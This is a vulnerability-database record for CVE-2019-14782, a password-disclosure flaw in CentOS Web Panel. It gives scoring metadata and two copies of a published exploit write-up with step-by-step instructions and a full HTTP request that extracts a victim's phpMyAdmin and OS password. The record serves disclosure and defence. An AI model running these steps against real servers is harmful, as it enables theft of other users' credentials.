ID: CVE-2019-14782
Type: cve
Reporter: cve@mitre.org
Modified: 2020-08-24T17:37:00
Description
CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.856 through 0.9.8.864 allows an attacker to get a victim's session file name from the /tmp directory, and the victim's token value from /usr/local/cwpsrv/logs/access_log, then use them to make a request to extract the victim's password (for the OS and phpMyAdmin) via an attacker account.
{"id": "CVE-2019-14782", "bulletinFamily": "NVD", "title": "CVE-2019-14782", "description": "CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.856 through 0.9.8.864 allows an attacker to get a victim's session file name from the /tmp directory, and the victim's token value from /usr/local/cwpsrv/logs/access_log, then use them to make a request to extract the victim's password (for the OS and phpMyAdmin) via an attacker account.", "published": "2019-12-17T16:15:00", "modified": "2020-08-24T17:37:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14782", "reporter": "cve@mitre.org", "references": ["https://packetstormsecurity.com/files/155676/Control-Web-Panel-0.9.8.864-phpMyAdmin-Password-Disclosure.html", "https://centos-webpanel.com/changelog-cwp7"], "cvelist": ["CVE-2019-14782"], "type": "cve", "lastseen": "2020-12-09T21:41:44", "edition": 8, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-33664"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155676"]}], "modified": "2020-12-09T21:41:44", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2020-12-09T21:41:44", "rev": 2}, "vulnersScore": 4.5}, "cpe": ["cpe:/a:centos-webpanel:centos_web_panel:0.9.8.864"], "affectedSoftware": [{"cpeName": "centos-webpanel:centos_web_panel", "name": "centos-webpanel centos web panel", "operator": "le", "version": "0.9.8.864"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": 
{"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:centos-webpanel:centos_web_panel:0.9.8.864:*:*:*:*:*:*:*"], "cwe": ["CWE-532"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:centos-webpanel:centos_web_panel:0.9.8.864:*:*:*:*:*:*:*", "versionEndIncluding": "0.9.8.864", "versionStartIncluding": "0.9.8.856", "vulnerable": true}], "operator": "OR"}]}}
{"packetstorm": [{"lastseen": "2019-12-16T22:59:54", "description": "", "published": "2019-12-16T00:00:00", "type": "packetstorm", "title": "Control Web Panel 0.9.8.864 phpMyAdmin Password Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-14782", "CVE-2019-15235"], "modified": "2019-12-16T00:00:00", "id": "PACKETSTORM:155676", "href": "https://packetstormsecurity.com/files/155676/Control-Web-Panel-0.9.8.864-phpMyAdmin-Password-Disclosure.html", "sourceData": "`Exploit Title : CWP (Control Web Panel) phpMyAdmin password access \nDate : 20 Aug 2019 \nExploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak \nVendor Homepage : https://control-webpanel.com/ \nSoftware Link : Not available, user panel only available for lastest version \nVersion : 0.9.8.856 - 0.9.8.864 \nTested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit) \nCVE-Number : CVE-2019-14782, CVE-2019-15235 \nReference : N/A \n \n1. Login as an low privileged user \n2. Get Session file name from path \"/tmp\" or /home/[USERNAME]/tmp/session/sess_xxxxxx\" \n3. Get token value from \"/usr/local/cwpsrv/logs/access_log\" \n4. Make a request to obtain target password \n \nGET /cwp_[token]/victim?module=pma HTTP/1.1 \nHost: 192.168.1.1:2083 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 \nAccept: */* \nAccept-Language: en-US,en;q=0.5 \nConnection: close \nReferer: https://192.168.1.1:2083/ \nCookie: PHPSESSID=[sess_xxxxxx] \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155676/cwpphpmyadmin-disclose.txt"}], "zdt": [{"lastseen": "2019-12-17T17:13:40", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-12-17T00:00:00", "title": "Control Web Panel 0.9.8.864 phpMyAdmin Password Disclosure Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-14782", "CVE-2019-15235"], "modified": "2019-12-17T00:00:00", "id": "1337DAY-ID-33664", "href": "https://0day.today/exploit/description/33664", "sourceData": "Exploit Title : CWP (Control Web Panel) phpMyAdmin password access\r\nExploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak\r\nVendor Homepage : https://control-webpanel.com/\r\nSoftware Link : Not available, user panel only available for lastest version\r\nVersion : 0.9.8.856 - 0.9.8.864 \r\nTested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)\r\nCVE-Number : CVE-2019-14782, CVE-2019-15235\r\nReference : N/A\r\n\r\n1. Login as an low privileged user\r\n2. Get Session file name from path \"/tmp\" or /home/[USERNAME]/tmp/session/sess_xxxxxx\"\r\n3. Get token value from \"/usr/local/cwpsrv/logs/access_log\"\r\n4. Make a request to obtain target password\r\n\r\nGET /cwp_[token]/victim?module=pma HTTP/1.1\r\nHost: 192.168.1.1:2083\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nConnection: close\r\nReferer: https://192.168.1.1:2083/\r\nCookie: PHPSESSID=[sess_xxxxxx]\n\n# 0day.today [2019-12-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33664"}]}